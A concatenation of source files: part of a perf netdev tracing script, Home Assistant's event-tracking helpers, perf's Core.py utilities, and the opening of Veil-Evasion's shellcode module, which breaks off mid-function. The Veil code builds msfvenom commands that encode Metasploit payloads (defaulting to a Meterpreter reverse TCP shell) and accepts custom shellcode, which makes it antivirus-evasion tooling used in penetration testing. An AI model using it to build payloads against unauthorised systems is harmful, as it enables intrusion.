'skbaddr':skbaddr, 'skblen':skblen, 'dev_name':dev_name})
irq_record.update({'event_list':irq_event_list})
irq_dic[cpu].append(irq_record)
def handle_netif_receive_skb(event_info):
global of_count_rx_skb_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
if cpu in net_rx_dic.keys():
rec_data = {'event_name':'netif_receive_skb',
'event_t':time, 'skbaddr':skbaddr, 'len':skblen}
event_list = net_rx_dic[cpu]['event_list']
event_list.append(rec_data)
rx_skb_list.insert(0, rec_data)
if len(rx_skb_list) > buffer_budget:
rx_skb_list.pop()
of_count_rx_skb_list += 1
def handle_net_dev_queue(event_info):
global of_count_tx_queue_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
skb = {'dev':dev_name, 'skbaddr':skbaddr, 'len':skblen, 'queue_t':time}
tx_queue_list.insert(0, skb)
if len(tx_queue_list) > buffer_budget:
tx_queue_list.pop()
of_count_tx_queue_list += 1
def handle_net_dev_xmit(event_info):
global of_count_tx_xmit_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, rc, dev_name) = event_info
if rc == 0: # NETDEV_TX_OK
for i in range(len(tx_queue_list)):
skb = tx_queue_list[i]
if skb['skbaddr'] == skbaddr:
skb['xmit_t'] = time
tx_xmit_list.insert(0, skb)
del tx_queue_list[i]
if len(tx_xmit_list) > buffer_budget:
tx_xmit_list.pop()
of_count_tx_xmit_list += 1
return
def handle_kfree_skb(event_info):
(name, context, cpu, time, pid, comm,
skbaddr, protocol, location) = event_info
for i in range(len(tx_queue_list)):
skb = tx_queue_list[i]
if skb['skbaddr'] == skbaddr:
del tx_queue_list[i]
return
for i in range(len(tx_xmit_list)):
skb = tx_xmit_list[i]
if skb['skbaddr'] == skbaddr:
skb['free_t'] = time
tx_free_list.append(skb)
del tx_xmit_list[i]
return
for i in range(len(rx_skb_list)):
rec_data = rx_skb_list[i]
if rec_data['skbaddr'] == skbaddr:
rec_data.update({'handle':"kfree_skb",
'comm':comm, 'pid':pid, 'comm_t':time})
del rx_skb_list[i]
return
def handle_consume_skb(event_info):
(name, context, cpu, time, pid, comm, skbaddr) = event_info
for i in range(len(tx_xmit_list)):
skb = tx_xmit_list[i]
if skb['skbaddr'] == skbaddr:
skb['free_t'] = time
tx_free_list.append(skb)
del tx_xmit_list[i]
return
def handle_skb_copy_datagram_iovec(event_info):
(name, context, cpu, time, pid, comm, skbaddr, skblen) = event_info
for i in range(len(rx_skb_list)):
rec_data = rx_skb_list[i]
if skbaddr == rec_data['skbaddr']:
rec_data.update({'handle':"skb_copy_datagram_iovec",
'comm':comm, 'pid':pid, 'comm_t':time})
del rx_skb_list[i]
return
| gpl-2.0 |
mKeRix/home-assistant | homeassistant/helpers/event.py | 2 | 21555 | """Helpers for listening to events."""
import asyncio
from datetime import datetime, timedelta
import functools as ft
import logging
import time
from typing import Any, Awaitable, Callable, Dict, Iterable, Optional, Union
import attr
from homeassistant.const import (
ATTR_NOW,
EVENT_CORE_CONFIG_UPDATE,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
MATCH_ALL,
SUN_EVENT_SUNRISE,
SUN_EVENT_SUNSET,
)
from homeassistant.core import CALLBACK_TYPE, Event, HomeAssistant, State, callback
from homeassistant.helpers.entity_registry import EVENT_ENTITY_REGISTRY_UPDATED
from homeassistant.helpers.sun import get_astral_event_next
from homeassistant.helpers.template import Template
from homeassistant.loader import bind_hass
from homeassistant.util import dt as dt_util
from homeassistant.util.async_ import run_callback_threadsafe
TRACK_STATE_CHANGE_CALLBACKS = "track_state_change_callbacks"
TRACK_STATE_CHANGE_LISTENER = "track_state_change_listener"
TRACK_ENTITY_REGISTRY_UPDATED_CALLBACKS = "track_entity_registry_updated_callbacks"
TRACK_ENTITY_REGISTRY_UPDATED_LISTENER = "track_entity_registry_updated_listener"
_LOGGER = logging.getLogger(__name__)
# PyLint does not like the use of threaded_listener_factory
# pylint: disable=invalid-name
def threaded_listener_factory(async_factory: Callable[..., Any]) -> CALLBACK_TYPE:
"""Convert an async event helper to a threaded one."""
@ft.wraps(async_factory)
def factory(*args: Any, **kwargs: Any) -> CALLBACK_TYPE:
"""Call async event helper safely."""
hass = args[0]
if not isinstance(hass, HomeAssistant):
raise TypeError("First parameter needs to be a hass instance")
async_remove = run_callback_threadsafe(
hass.loop, ft.partial(async_factory, *args, **kwargs)
).result()
def remove() -> None:
"""Threadsafe removal."""
run_callback_threadsafe(hass.loop, async_remove).result()
return remove
return factory
@callback
@bind_hass
def async_track_state_change(
hass: HomeAssistant,
entity_ids: Union[str, Iterable[str]],
action: Callable[[str, State, State], None],
from_state: Union[None, str, Iterable[str]] = None,
to_state: Union[None, str, Iterable[str]] = None,
) -> CALLBACK_TYPE:
"""Track specific state changes.
entity_ids, from_state and to_state can be string or list.
Use list to match multiple.
Returns a function that can be called to remove the listener.
If entity_ids are not MATCH_ALL along with from_state and to_state
being None, async_track_state_change_event should be used instead
as it is slightly faster.
Must be run within the event loop.
"""
if from_state is not None:
match_from_state = process_state_match(from_state)
if to_state is not None:
match_to_state = process_state_match(to_state)
# Ensure it is a lowercase list with entity ids we want to match on
if entity_ids == MATCH_ALL:
pass
elif isinstance(entity_ids, str):
entity_ids = (entity_ids.lower(),)
else:
entity_ids = tuple(entity_id.lower() for entity_id in entity_ids)
@callback
def state_change_listener(event: Event) -> None:
"""Handle specific state changes."""
if from_state is not None:
old_state = event.data.get("old_state")
if old_state is not None:
old_state = old_state.state
if not match_from_state(old_state):
return
if to_state is not None:
new_state = event.data.get("new_state")
if new_state is not None:
new_state = new_state.state
if not match_to_state(new_state):
return
hass.async_run_job(
action,
event.data.get("entity_id"),
event.data.get("old_state"),
event.data.get("new_state"),
)
if entity_ids != MATCH_ALL:
# If we have a list of entity ids we use
# async_track_state_change_event to route
# by entity_id to avoid iterating though state change
# events and creating a jobs where the most
# common outcome is to return right away because
# the entity_id does not match since usually
# only one or two listeners want that specific
# entity_id.
return async_track_state_change_event(hass, entity_ids, state_change_listener)
return hass.bus.async_listen(EVENT_STATE_CHANGED, state_change_listener)
track_state_change = threaded_listener_factory(async_track_state_change)
@bind_hass
def async_track_state_change_event(
hass: HomeAssistant,
entity_ids: Union[str, Iterable[str]],
action: Callable[[Event], Any],
) -> Callable[[], None]:
"""Track specific state change events indexed by entity_id.
Unlike async_track_state_change, async_track_state_change_event
passes the full event to the callback.
In order to avoid having to iterate a long list
of EVENT_STATE_CHANGED and fire and create a job
for each one, we keep a dict of entity ids that
care about the state change events so we can
do a fast dict lookup to route events.
"""
entity_callbacks = hass.data.setdefault(TRACK_STATE_CHANGE_CALLBACKS, {})
if TRACK_STATE_CHANGE_LISTENER not in hass.data:
@callback
def _async_state_change_dispatcher(event: Event) -> None:
"""Dispatch state changes by entity_id."""
entity_id = event.data.get("entity_id")
if entity_id not in entity_callbacks:
return
for action in entity_callbacks[entity_id][:]:
try:
hass.async_run_job(action, event)
except Exception: # pylint: disable=broad-except
_LOGGER.exception(
"Error while processing state changed for %s", entity_id
)
hass.data[TRACK_STATE_CHANGE_LISTENER] = hass.bus.async_listen(
EVENT_STATE_CHANGED, _async_state_change_dispatcher
)
if isinstance(entity_ids, str):
entity_ids = [entity_ids]
entity_ids = [entity_id.lower() for entity_id in entity_ids]
for entity_id in entity_ids:
entity_callbacks.setdefault(entity_id, []).append(action)
@callback
def remove_listener() -> None:
"""Remove state change listener."""
_async_remove_entity_listeners(
hass,
TRACK_STATE_CHANGE_CALLBACKS,
TRACK_STATE_CHANGE_LISTENER,
entity_ids,
action,
)
return remove_listener
@callback
def _async_remove_entity_listeners(
hass: HomeAssistant,
storage_key: str,
listener_key: str,
entity_ids: Iterable[str],
action: Callable[[Event], Any],
) -> None:
"""Remove a listener."""
entity_callbacks = hass.data[storage_key]
for entity_id in entity_ids:
entity_callbacks[entity_id].remove(action)
if len(entity_callbacks[entity_id]) == 0:
del entity_callbacks[entity_id]
if not entity_callbacks:
hass.data[listener_key]()
del hass.data[listener_key]
@bind_hass
def async_track_entity_registry_updated_event(
hass: HomeAssistant,
entity_ids: Union[str, Iterable[str]],
action: Callable[[Event], Any],
) -> Callable[[], None]:
"""Track specific entity registry updated events indexed by entity_id.
Similar to async_track_state_change_event.
"""
entity_callbacks = hass.data.setdefault(TRACK_ENTITY_REGISTRY_UPDATED_CALLBACKS, {})
if TRACK_ENTITY_REGISTRY_UPDATED_LISTENER not in hass.data:
@callback
def _async_entity_registry_updated_dispatcher(event: Event) -> None:
"""Dispatch entity registry updates by entity_id."""
entity_id = event.data.get("old_entity_id", event.data["entity_id"])
if entity_id not in entity_callbacks:
return
for action in entity_callbacks[entity_id][:]:
try:
hass.async_run_job(action, event)
except Exception: # pylint: disable=broad-except
_LOGGER.exception(
"Error while processing entity registry update for %s",
entity_id,
)
hass.data[TRACK_ENTITY_REGISTRY_UPDATED_LISTENER] = hass.bus.async_listen(
EVENT_ENTITY_REGISTRY_UPDATED, _async_entity_registry_updated_dispatcher
)
if isinstance(entity_ids, str):
entity_ids = [entity_ids]
entity_ids = [entity_id.lower() for entity_id in entity_ids]
for entity_id in entity_ids:
entity_callbacks.setdefault(entity_id, []).append(action)
@callback
def remove_listener() -> None:
"""Remove state change listener."""
_async_remove_entity_listeners(
hass,
TRACK_ENTITY_REGISTRY_UPDATED_CALLBACKS,
TRACK_ENTITY_REGISTRY_UPDATED_LISTENER,
entity_ids,
action,
)
return remove_listener
@callback
@bind_hass
def async_track_template(
hass: HomeAssistant,
template: Template,
action: Callable[[str, State, State], None],
variables: Optional[Dict[str, Any]] = None,
) -> CALLBACK_TYPE:
"""Add a listener that track state changes with template condition."""
from . import condition # pylint: disable=import-outside-toplevel
# Local variable to keep track of if the action has already been triggered
already_triggered = False
@callback
def template_condition_listener(entity_id: str, from_s: State, to_s: State) -> None:
"""Check if condition is correct and run action."""
nonlocal already_triggered
template_result = condition.async_template(hass, template, variables)
# Check to see if template returns true
if template_result and not already_triggered:
already_triggered = True
hass.async_run_job(action, entity_id, from_s, to_s)
elif not template_result:
already_triggered = False
return async_track_state_change(
hass, template.extract_entities(variables), template_condition_listener
)
track_template = threaded_listener_factory(async_track_template)
@callback
@bind_hass
def async_track_same_state(
hass: HomeAssistant,
period: timedelta,
action: Callable[..., None],
async_check_same_func: Callable[[str, Optional[State], Optional[State]], bool],
entity_ids: Union[str, Iterable[str]] = MATCH_ALL,
) -> CALLBACK_TYPE:
"""Track the state of entities for a period and run an action.
If async_check_func is None it use the state of orig_value.
Without entity_ids we track all state changes.
"""
async_remove_state_for_cancel: Optional[CALLBACK_TYPE] = None
async_remove_state_for_listener: Optional[CALLBACK_TYPE] = None
@callback
def clear_listener() -> None:
"""Clear all unsub listener."""
nonlocal async_remove_state_for_cancel, async_remove_state_for_listener
if async_remove_state_for_listener is not None:
async_remove_state_for_listener()
async_remove_state_for_listener = None
if async_remove_state_for_cancel is not None:
async_remove_state_for_cancel()
async_remove_state_for_cancel = None
@callback
def state_for_listener(now: Any) -> None:
"""Fire on state changes after a delay and calls action."""
nonlocal async_remove_state_for_listener
async_remove_state_for_listener = None
clear_listener()
hass.async_run_job(action)
@callback
def state_for_cancel_listener(event: Event) -> None:
"""Fire on changes and cancel for listener if changed."""
entity: str = event.data["entity_id"]
from_state: Optional[State] = event.data.get("old_state")
to_state: Optional[State] = event.data.get("new_state")
if not async_check_same_func(entity, from_state, to_state):
clear_listener()
async_remove_state_for_listener = async_track_point_in_utc_time(
hass, state_for_listener, dt_util.utcnow() + period
)
if entity_ids == MATCH_ALL:
async_remove_state_for_cancel = hass.bus.async_listen(
EVENT_STATE_CHANGED, state_for_cancel_listener
)
else:
async_remove_state_for_cancel = async_track_state_change_event(
hass,
[entity_ids] if isinstance(entity_ids, str) else entity_ids,
state_for_cancel_listener,
)
return clear_listener
track_same_state = threaded_listener_factory(async_track_same_state)
@callback
@bind_hass
def async_track_point_in_time(
hass: HomeAssistant, action: Callable[..., None], point_in_time: datetime
) -> CALLBACK_TYPE:
"""Add a listener that fires once after a specific point in time."""
@callback
def utc_converter(utc_now: datetime) -> None:
"""Convert passed in UTC now to local now."""
hass.async_run_job(action, dt_util.as_local(utc_now))
return async_track_point_in_utc_time(hass, utc_converter, point_in_time)
track_point_in_time = threaded_listener_factory(async_track_point_in_time)
@callback
@bind_hass
def async_track_point_in_utc_time(
hass: HomeAssistant, action: Callable[..., Any], point_in_time: datetime
) -> CALLBACK_TYPE:
"""Add a listener that fires once after a specific point in UTC time."""
# Ensure point_in_time is UTC
utc_point_in_time = dt_util.as_utc(point_in_time)
cancel_callback = hass.loop.call_at(
hass.loop.time() + point_in_time.timestamp() - time.time(),
hass.async_run_job,
action,
utc_point_in_time,
)
@callback
def unsub_point_in_time_listener() -> None:
"""Cancel the call_later."""
cancel_callback.cancel()
return unsub_point_in_time_listener
track_point_in_utc_time = threaded_listener_factory(async_track_point_in_utc_time)
@callback
@bind_hass
def async_call_later(
hass: HomeAssistant, delay: float, action: Callable[..., None]
) -> CALLBACK_TYPE:
"""Add a listener that is called in <delay>."""
return async_track_point_in_utc_time(
hass, action, dt_util.utcnow() + timedelta(seconds=delay)
)
call_later = threaded_listener_factory(async_call_later)
@callback
@bind_hass
def async_track_time_interval(
hass: HomeAssistant,
action: Callable[..., Union[None, Awaitable]],
interval: timedelta,
) -> CALLBACK_TYPE:
"""Add a listener that fires repetitively at every timedelta interval."""
remove = None
def next_interval() -> datetime:
"""Return the next interval."""
return dt_util.utcnow() + interval
@callback
def interval_listener(now: datetime) -> None:
"""Handle elapsed intervals."""
nonlocal remove
remove = async_track_point_in_utc_time(hass, interval_listener, next_interval())
hass.async_run_job(action, now)
remove = async_track_point_in_utc_time(hass, interval_listener, next_interval())
def remove_listener() -> None:
"""Remove interval listener."""
remove()
return remove_listener
track_time_interval = threaded_listener_factory(async_track_time_interval)
@attr.s
class SunListener:
"""Helper class to help listen to sun events."""
hass: HomeAssistant = attr.ib()
action: Callable[..., None] = attr.ib()
event: str = attr.ib()
offset: Optional[timedelta] = attr.ib()
_unsub_sun: Optional[CALLBACK_TYPE] = attr.ib(default=None)
_unsub_config: Optional[CALLBACK_TYPE] = attr.ib(default=None)
@callback
def async_attach(self) -> None:
"""Attach a sun listener."""
assert self._unsub_config is None
self._unsub_config = self.hass.bus.async_listen(
EVENT_CORE_CONFIG_UPDATE, self._handle_config_event
)
self._listen_next_sun_event()
@callback
def async_detach(self) -> None:
"""Detach the sun listener."""
assert self._unsub_sun is not None
assert self._unsub_config is not None
self._unsub_sun()
self._unsub_sun = None
self._unsub_config()
self._unsub_config = None
@callback
def _listen_next_sun_event(self) -> None:
"""Set up the sun event listener."""
assert self._unsub_sun is None
self._unsub_sun = async_track_point_in_utc_time(
self.hass,
self._handle_sun_event,
get_astral_event_next(self.hass, self.event, offset=self.offset),
)
@callback
def _handle_sun_event(self, _now: Any) -> None:
"""Handle solar event."""
self._unsub_sun = None
self._listen_next_sun_event()
self.hass.async_run_job(self.action)
@callback
def _handle_config_event(self, _event: Any) -> None:
"""Handle core config update."""
assert self._unsub_sun is not None
self._unsub_sun()
self._unsub_sun = None
self._listen_next_sun_event()
@callback
@bind_hass
def async_track_sunrise(
hass: HomeAssistant, action: Callable[..., None], offset: Optional[timedelta] = None
) -> CALLBACK_TYPE:
"""Add a listener that will fire a specified offset from sunrise daily."""
listener = SunListener(hass, action, SUN_EVENT_SUNRISE, offset)
listener.async_attach()
return listener.async_detach
track_sunrise = threaded_listener_factory(async_track_sunrise)
@callback
@bind_hass
def async_track_sunset(
hass: HomeAssistant, action: Callable[..., None], offset: Optional[timedelta] = None
) -> CALLBACK_TYPE:
"""Add a listener that will fire a specified offset from sunset daily."""
listener = SunListener(hass, action, SUN_EVENT_SUNSET, offset)
listener.async_attach()
return listener.async_detach
track_sunset = threaded_listener_factory(async_track_sunset)
# For targeted patching in tests
pattern_utc_now = dt_util.utcnow
@callback
@bind_hass
def async_track_utc_time_change(
hass: HomeAssistant,
action: Callable[..., None],
hour: Optional[Any] = None,
minute: Optional[Any] = None,
second: Optional[Any] = None,
local: bool = False,
) -> CALLBACK_TYPE:
"""Add a listener that will fire if time matches a pattern."""
# We do not have to wrap the function with time pattern matching logic
# if no pattern given
if all(val is None for val in (hour, minute, second)):
@callback
def time_change_listener(event: Event) -> None:
"""Fire every time event that comes in."""
hass.async_run_job(action, event.data[ATTR_NOW])
return hass.bus.async_listen(EVENT_TIME_CHANGED, time_change_listener)
matching_seconds = dt_util.parse_time_expression(second, 0, 59)
matching_minutes = dt_util.parse_time_expression(minute, 0, 59)
matching_hours = dt_util.parse_time_expression(hour, 0, 23)
next_time: datetime = dt_util.utcnow()
def calculate_next(now: datetime) -> None:
"""Calculate and set the next time the trigger should fire."""
nonlocal next_time
localized_now = dt_util.as_local(now) if local else now
next_time = dt_util.find_next_time_expression_time(
localized_now, matching_seconds, matching_minutes, matching_hours
)
# Make sure rolling back the clock doesn't prevent the timer from
# triggering.
cancel_callback: Optional[asyncio.TimerHandle] = None
calculate_next(next_time)
@callback
def pattern_time_change_listener() -> None:
"""Listen for matching time_changed events."""
nonlocal next_time, cancel_callback
now = pattern_utc_now()
hass.async_run_job(action, dt_util.as_local(now) if local else now)
calculate_next(now + timedelta(seconds=1))
cancel_callback = hass.loop.call_at(
hass.loop.time() + next_time.timestamp() - time.time(),
pattern_time_change_listener,
)
cancel_callback = hass.loop.call_at(
hass.loop.time() + next_time.timestamp() - time.time(),
pattern_time_change_listener,
)
@callback
def unsub_pattern_time_change_listener() -> None:
"""Cancel the call_later."""
nonlocal cancel_callback
assert cancel_callback is not None
cancel_callback.cancel()
return unsub_pattern_time_change_listener
track_utc_time_change = threaded_listener_factory(async_track_utc_time_change)
@callback
@bind_hass
def async_track_time_change(
hass: HomeAssistant,
action: Callable[..., None],
hour: Optional[Any] = None,
minute: Optional[Any] = None,
second: Optional[Any] = None,
) -> CALLBACK_TYPE:
"""Add a listener that will fire if UTC time matches a pattern."""
return async_track_utc_time_change(hass, action, hour, minute, second, local=True)
track_time_change = threaded_listener_factory(async_track_time_change)
def process_state_match(
parameter: Union[None, str, Iterable[str]]
) -> Callable[[str], bool]:
"""Convert parameter to function that matches input against parameter."""
if parameter is None or parameter == MATCH_ALL:
return lambda _: True
if isinstance(parameter, str) or not hasattr(parameter, "__iter__"):
return lambda state: state == parameter
parameter_set = set(parameter)
return lambda state: state in parameter_set
| mit |
PaoloW8/android_kernel_ZTE_NX505J | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Core.py | 11088 | 3246 | # Core.py - Python extension for perf script, core functions
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
from collections import defaultdict
def autodict():
return defaultdict(autodict)
flag_fields = autodict()
symbolic_fields = autodict()
def define_flag_field(event_name, field_name, delim):
flag_fields[event_name][field_name]['delim'] = delim
def define_flag_value(event_name, field_name, value, field_str):
flag_fields[event_name][field_name]['values'][value] = field_str
def define_symbolic_field(event_name, field_name):
# nothing to do, really
pass
def define_symbolic_value(event_name, field_name, value, field_str):
symbolic_fields[event_name][field_name]['values'][value] = field_str
def flag_str(event_name, field_name, value):
string = ""
if flag_fields[event_name][field_name]:
print_delim = 0
keys = flag_fields[event_name][field_name]['values'].keys()
keys.sort()
for idx in keys:
if not value and not idx:
string += flag_fields[event_name][field_name]['values'][idx]
break
if idx and (value & idx) == idx:
if print_delim and flag_fields[event_name][field_name]['delim']:
string += " " + flag_fields[event_name][field_name]['delim'] + " "
string += flag_fields[event_name][field_name]['values'][idx]
print_delim = 1
value &= ~idx
return string
def symbol_str(event_name, field_name, value):
string = ""
if symbolic_fields[event_name][field_name]:
keys = symbolic_fields[event_name][field_name]['values'].keys()
keys.sort()
for idx in keys:
if not value and not idx:
string = symbolic_fields[event_name][field_name]['values'][idx]
break
if (value == idx):
string = symbolic_fields[event_name][field_name]['values'][idx]
break
return string
trace_flags = { 0x00: "NONE", \
0x01: "IRQS_OFF", \
0x02: "IRQS_NOSUPPORT", \
0x04: "NEED_RESCHED", \
0x08: "HARDIRQ", \
0x10: "SOFTIRQ" }
def trace_flag_str(value):
string = ""
print_delim = 0
keys = trace_flags.keys()
for idx in keys:
if not value and not idx:
string += "NONE"
break
if idx and (value & idx) == idx:
if print_delim:
string += " | ";
string += trace_flags[idx]
print_delim = 1
value &= ~idx
return string
def taskState(state):
states = {
0 : "R",
1 : "S",
2 : "D",
64: "DEAD"
}
if state not in states:
return "Unknown"
return states[state]
class EventHeaders:
def __init__(self, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
self.cpu = common_cpu
self.secs = common_secs
self.nsecs = common_nsecs
self.pid = common_pid
self.comm = common_comm
def ts(self):
return (self.secs * (10 ** 9)) + self.nsecs
def ts_format(self):
return "%d.%d" % (self.secs, int(self.nsecs / 1000))
| gpl-2.0 |
codercold/Veil-Evasion | modules/common/shellcode.py | 1 | 21068 | """
Contains main Shellcode class as well as the Completer class used
for tab completion of metasploit payload selection.
"""
# Import Modules
import commands
import socket
import sys
import os
import sys
import re
import readline
import subprocess
import binascii
from modules.common import messages
from modules.common import helpers
from modules.common import completers
import settings
class Shellcode:
"""
Class that represents a shellcode object, custom of msfvenom generated.
"""
def __init__(self):
# the nested dictionary passed to the completer
self.payloadTree = {}
# the entier msfvenom command that may be built
self.msfvenomCommand = ""
# any associated msfvenom options
self.msfvenomOptions = list()
# in case user specifies a custom shellcode string
self.customshellcode = ""
# specific msfvenom payload specified
self.msfvenompayload= ""
# misc options
self.options = list()
# load up all the metasploit modules available
self.LoadModules()
def Reset(self):
"""
reset the state of any internal variables, everything but self.payloadTree
"""
self.msfvenomCommand = ""
self.msfvenomOptions = list()
self.customshellcode = ""
self.msfvenompayload= ""
self.options = list()
def LoadModules(self):
"""
Crawls the metasploit install tree and extracts available payloads
and their associated required options for langauges specified.
"""
# Variable changed for compatibility with non-root and non-Kali users
# Thanks to Tim Medin for the patch
msfFolder = settings.METASPLOIT_PATH
# I can haz multiple platforms?
platforms = ["windows"]
for platform in platforms:
self.payloadTree[platform] = {}
stagesX86 = list()
stagersX86 = list()
stagesX64 = list()
stagersX64 = list()
# load up all the stages (meterpreter/vnc/etc.)
# TODO: detect Windows and modify the paths appropriately
for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/stages/" + platform + "/"):
for f in files:
stageName = f.split(".")[0]
if "x64" in root:
stagesX64.append(f.split(".")[0])
if "x64" not in self.payloadTree[platform]:
self.payloadTree[platform]["x64"] = {}
self.payloadTree[platform]["x64"][stageName] = {}
elif "x86" in root: # linux payload structure format
stagesX86.append(f.split(".")[0])
if "x86" not in self.payloadTree[platform]:
self.payloadTree[platform]["x86"] = {}
self.payloadTree[platform]["x86"][stageName] = {}
else: # windows payload structure format
stagesX86.append(f.split(".")[0])
if stageName not in self.payloadTree[platform]:
self.payloadTree[platform][stageName] = {}
# load up all the stagers (reverse_tcp, bind_tcp, etc.)
# TODO: detect Windows and modify the paths appropriately
for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/stagers/" + platform + "/"):
for f in files:
if ".rb" in f:
extraOptions = list()
moduleName = f.split(".")[0]
lines = open(root + "/" + f).readlines()
for line in lines:
if "OptString" in line.strip() and "true" in line.strip():
cmd = line.strip().split(",")[0].replace("OptString.new(","")[1:-1]
extraOptions.append(cmd)
if "bind" in f:
if "x64" in root:
for stage in stagesX64:
self.payloadTree[platform]["x64"][stage][moduleName] = ["LPORT"] + extraOptions
elif "x86" in root:
for stage in stagesX86:
self.payloadTree[platform]["x86"][stage][moduleName] = ["LPORT"] + extraOptions
else:
for stage in stagesX86:
self.payloadTree[platform][stage][moduleName] = ["LPORT"] + extraOptions
if "reverse" in f:
if "x64" in root:
for stage in stagesX64:
self.payloadTree[platform]["x64"][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
elif "x86" in root:
for stage in stagesX86:
self.payloadTree[platform]["x86"][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
else:
for stage in stagesX86:
self.payloadTree[platform][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
# load up any payload singles
# TODO: detect Windows and modify the paths appropriately
for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/singles/" + platform + "/"):
for f in files:
if ".rb" in f:
lines = open(root + "/" + f).readlines()
totalOptions = list()
moduleName = f.split(".")[0]
for line in lines:
if "OptString" in line.strip() and "true" in line.strip():
cmd = line.strip().split(",")[0].replace("OptString.new(","")[1:-1]
totalOptions.append(cmd)
if "bind" in f:
totalOptions.append("LPORT")
if "reverse" in f:
totalOptions.append("LHOST")
totalOptions.append("LPORT")
if "x64" in root:
self.payloadTree[platform]["x64"][moduleName] = totalOptions
elif "x86" in root:
self.payloadTree[platform]["x86"][moduleName] = totalOptions
else:
self.payloadTree[platform][moduleName] = totalOptions
def SetPayload(self, payloadAndOptions):
"""
Manually set the payload/options, used in scripting
payloadAndOptions = nested 2 element list of [msfvenom_payload, ["option=value",...]]
i.e. ["windows/meterpreter/reverse_tcp", ["LHOST=192.168.1.1","LPORT=443"]]
"""
# extract the msfvenom payload and options
payload = payloadAndOptions[0]
options = payloadAndOptions[1]
# grab any specified msfvenom options in the /etc/veil/settings.py file
msfvenomOptions = ""
if hasattr(settings, "MSFVENOM_OPTIONS"):
msfvenomOptions = settings.MSFVENOM_OPTIONS
# build the msfvenom command
# TODO: detect Windows and modify the msfvenom command appropriately
self.msfvenomCommand = "msfvenom " + msfvenomOptions + " -p " + payload
# add options only if we have some
if options:
for option in options:
self.msfvenomCommand += " " + option + " "
self.msfvenomCommand += " -b \'\\x00\\x0a\\xff\' -e x86/shikata_ga_nai -f c | tr -d \'\"\' | tr -d \'\n\'"
# set the internal msfvenompayload to this payload
self.msfvenompayload = payload
# set the internal msfvenomOptions to these options
if options:
for option in options:
self.msfvenomOptions.append(option)
def setCustomShellcode(self, customShellcode):
"""
Manually set self.customshellcode to the shellcode string passed.
customShellcode = shellcode string ("\x00\x01...")
"""
self.customshellcode = customShellcode
def custShellcodeMenu(self, showTitle=True):
"""
Menu to prompt the user for a custom shellcode string.
Returns None if nothing is specified.
"""
# print out the main title to reset the interface
if showTitle:
messages.title()
print ' [?] Use msfvenom or supply custom shellcode?\n'
print ' 1 - msfvenom (default)'
print ' 2 - custom shellcode string'
print ' 3 - file with shellcode (raw)\n'
choice = raw_input(" [>] Please enter the number of your choice: ")
if choice == '3':
# instantiate our completer object for path completion
comp = completers.PathCompleter()
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# if the shellcode is specicified as a raw file
filePath = raw_input(" [>] Please enter the path to your raw shellcode file: ")
try:
shellcodeFile = open(filePath, 'rb')
CustShell = shellcodeFile.read()
shellcodeFile.close()
except:
print helpers.color(" [!] WARNING: path not found, defaulting to msfvenom!", warning=True)
return None
if len(CustShell) == 0:
print helpers.color(" [!] WARNING: no custom shellcode restrieved, defaulting to msfvenom!", warning=True)
return None
# check if the shellcode was passed in as string-escaped form
if CustShell[0:2] == "\\x" and CustShell[4:6] == "\\x":
return CustShell
else:
# otherwise encode the raw data as a hex string
hexString = binascii.hexlify(CustShell)
CustShell = "\\x"+"\\x".join([hexString[i:i+2] for i in range(0,len(hexString),2)])
return CustShell
# remove the completer
readline.set_completer(None)
if choice == '2':
# if the shellcode is specified as a string
CustomShell = raw_input(" [>] Please enter custom shellcode (one line, no quotes, \\x00.. format): ")
if len(CustomShell) == 0:
print helpers.color(" [!] WARNING: no spellcode specified, defaulting to msfvenom!", warning=True)
return CustomShell
elif choice != '1':
print helpers.color(" [!] WARNING: Invalid option chosen, defaulting to msfvenom!", warning=True)
return None
else:
return None
def menu(self):
"""
Main interactive menu for shellcode selection.
Utilizes Completer() to do tab completion on loaded metasploit payloads.
"""
payloadSelected = None
options = None
# if no generation method has been selected yet
if self.msfvenomCommand == "" and self.customshellcode == "":
# prompt for custom shellcode
customShellcode = self.custShellcodeMenu()
# if custom shellcode is specified, set it
if customShellcode:
self.customshellcode = customShellcode
# else, if no custom shellcode is specified, prompt for metasploit
else:
# instantiate our completer object for tab completion of available payloads
comp = completers.MSFCompleter(self.payloadTree)
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# have the user select the payload
while payloadSelected == None:
print '\n [*] Press [enter] for windows/meterpreter/reverse_tcp'
print ' [*] Press [tab] to list available payloads'
payloadSelected = raw_input(' [>] Please enter metasploit payload: ').strip()
if payloadSelected == "":
# default to reverse_tcp for the payload
payloadSelected = "windows/meterpreter/reverse_tcp"
try:
parts = payloadSelected.split("/")
# walk down the selected parts of the payload tree to get to the options at the bottom
options = self.payloadTree
for part in parts:
options = options[part]
except KeyError:
# make sure user entered a valid payload
print helpers.color(" [!] ERROR: Invalid payload specified!\n", warning=True)
payloadSelected = None
# remove the tab completer
readline.set_completer(None)
# set the internal payload to the one selected
self.msfvenompayload = payloadSelected
# request a value for each required option
for option in options:
value = ""
while value == "":
### VALIDATION ###
# LHOST is a special case, so we can tab complete the local IP
if option == "LHOST":
# set the completer to fill in the local IP
readline.set_completer(completers.IPCompleter().complete)
value = raw_input(' [>] Enter value for \'LHOST\', [tab] for local IP: ')
if '.' in value:
hostParts = value.split(".")
if len(hostParts) > 1:
# if the last chunk is a number, assume it's an IP address
if hostParts[-1].isdigit():
# do a regex IP validation
